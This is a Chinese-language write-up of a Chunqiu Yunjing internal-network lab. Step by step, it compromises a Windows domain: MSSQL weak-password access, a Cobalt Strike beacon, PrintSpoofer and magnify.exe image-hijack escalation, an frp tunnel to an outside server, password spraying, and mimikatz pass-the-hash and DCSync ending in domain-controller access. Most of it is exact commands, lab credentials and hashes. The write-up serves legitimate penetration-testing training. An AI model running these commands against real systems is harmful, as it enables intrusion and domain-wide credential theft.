# 前言:

很久之前就发现了春秋云镜这个 yyds 平台,霄壤实验室的,内网练习好靶场,但是由于经费紧张,就很长时间没碰了,最近参加比赛成绩比较好,实验室老师给了我们一笔资金来学习,就买了一些沙砾,开始兴奋起来了!直接开始。

# Rustscan 扫描

命令

rustscan.exe -u 10000 -a 39.101.131.233

发现 1433 mssql 开放

# fscan 扫描

命令

fscan.exe -h 39.101.131.233

扫描出了 mssql 弱口令 sa 1qaz!QAZ

# Multiple Database Utilization (数据库)

直接右键添加 mssql 数据库

1qaz!QAZ

# shell1

成功拿到第一个 shell

# CS 派生

直接创建监听器,然后生成 exe 木马,通过数据库上传到 windows

直接运行 exe 文件,发现 cs 已经上线

# WIN-WEB 提权

# PrintSpoofer.exe 提权 (system)

命令:

shell C:\\Users\\Public\\PrintSpoofer64.exe -i -c  "C:\\Users\\Public\\artifact_x64.exe"

PrintSpoofer64.exe 是 system 权限,所以直接用 PrintSpoofer64.exe 运行木马就可以上线 cs 了

# flag01

打开 system 权限的 beacon

shell type C:\Users\Administrator\flag\flag01.txt

# 横向移动

# 抓取 hash 和查看用户 (john)

发现 john 用户,直接查看该用户进程 WIN-WEB/john,上线 john

成功上线 John

cs 打开 john 用户 shell 交互界面,执行 shell net use 查询 john 用户挂载情况

shell net use

发现 C 盘下面有东西

dir \\TSCLIENT\C 查看文件

查看文件,发现账号密码

shell type \\tsclient\c\credential.txt

ipconfig 查看机器 ip

传入 fscan 扫描内网

# 消除端口占用

netstat -tulpn | grep 8006(被占用的端口)
显示pid

kill -9 pid

# frp 内网穿透

frps.toml (服务端启动)

bindPort = 7777

frpc.toml (客户端启动)

serverAddr = "117.50.196.44"
serverPort = 7777

[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 8888
[proxies.plugin]
type = "socks5"

注意:serverAddr 必须为服务器 ip
傻逼了,搭隧道用了一个多小时
proxychain 直接扫隧道就行了,服务器要出网

shell C:\Users\Public\frpc.exe -c C:\Users\Public\frpc.toml

隧道搭建成功

# CS socks 转发

socks 1080

vim /etc/proxychains4.conf

然后修改 proxychain 的配置文件,改为对应 1080

# Proxychain 密码喷洒

隧道搭建以后,kali 可以访问内网,然后密码喷洒

proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

上图提示 failure 是队友改了密码
发现提示密码过期使用 smbpasswd 进行修改密码

proxychains -q python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'bpbpbp'

注意:其中 Ald@rLMWuy7Z!# 是密码,打靶场时,被队友改了我不清楚,照抄就改不了,要修改密码为已经改的

# SocksCap64 本地代理


#### 附加进程
右键程序,选择附加进程
将代理附加到远程桌面进程

链接成功

# 映像劫持 (获取 system)

根据之前的提示映像劫持提权

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

发现 NT AUTHORITY \Authenticated Users 可以修改注册表
即所有账号密码登录的用户都可以修改注册表,利用这个性质,修改注册表,使用放大镜进行提权

修改注册表映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

锁定电脑,右下角点击放大镜,获取 system 权限

# 正向木马链接

因为不出网,生成正向链接木马

cmd 运行木马成功上线

# flag02

shell type C:\Users\Administrator\flag\flag02.txt

shell net group "domain admins" /domain
发现win2016$在域管组里,即机器账户可以Hash传递登录域控。

# mimikatz

利用 mimikatz 注入机器账户的 hash

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b47c845655f06fb51ede6767aabbb33f" "exit"

利用 mimikatz dcsync dump 域控 hash

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab  /user:Administrator" "exit"

利用 mimikatz dcsync dump 域控 hash

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

# Hash 传递登录域控

proxychains python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

# flag03

# 总结构

# 参考:

狗 and 猫 师傅
https://fushuling.com/